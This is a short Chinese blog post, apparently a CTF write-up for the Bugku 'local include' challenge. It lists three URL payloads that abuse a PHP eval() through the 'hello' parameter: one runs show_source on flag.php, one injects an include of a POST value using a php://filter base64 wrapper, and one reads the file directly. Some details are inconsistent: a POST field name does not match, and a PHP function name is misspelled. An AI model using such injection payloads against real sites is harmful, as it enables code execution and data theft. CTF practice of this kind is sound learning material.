bugku-本地包含(文件包含漏洞)

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/dyw_666666/article/details/82389457

这里写图片描述
这里写图片描述

方法一:eval存在命令执行漏洞,使用hello构造payload

http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3

这里写图片描述

方法二:

http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//POST区域:b=php://filter/convert.base64-encode/resource=flag.php

这里写图片描述
Base64解码即可。

方法三:直接将flag.php文件读入变量hello中

?hello=get_file_contents('flag.php')
?hello=file('flag.php')

这里写图片描述

猜你喜欢

转载自blog.csdn.net/dyw_666666/article/details/82389457
今日推荐